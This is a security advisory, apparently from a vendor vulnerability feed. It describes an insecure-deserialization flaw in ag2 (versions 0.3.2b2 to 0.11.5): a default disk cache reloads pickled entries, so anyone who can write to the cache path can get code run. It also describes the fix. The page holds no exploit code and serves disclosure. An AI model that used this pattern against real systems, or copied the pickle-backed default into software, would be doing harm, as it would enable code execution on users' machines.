AIKIDO-2026-10543
ag2 is vulnerable to Insecure Deserialization
75
High Risk
This Affects:
ag2TL;DR
The package used to list diskcache as a required install and the default cache_factory path constructed a disk-backed DiskCache when neither Redis nor Cosmos DB was configured. The diskcache library rehydrates stored objects with pickle, so a party that can place or modify files under the cache path can get arbitrary code to run when those entries are read. The change makes diskcache optional, documents the risk on the import path, defaults the factory to in-memory caching when the disk extra is not present, and only uses the disk implementation when the optional diskcache extra is installed.
Who does this affect?
You are affected if you are using a version that falls within the vulnerable range.
Background info
ag2 is vulnerable to Insecure Deserialization in versions 0.3.2b2 - 0.11.5.
How to fix this
Upgrade the ag2 library to the patch version.
Links
GitHub Release
Other
github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69872-DiskCache-Pickle-Deserialization.mdgithub.com/grantjenks/python-diskcache
Are You Affected?
Connect your repositories to instantly see whether vulnerable or malicious packages exist in your codebase.
Free. No credit card required.
SOC 2Compliant
ISO 27001Compliant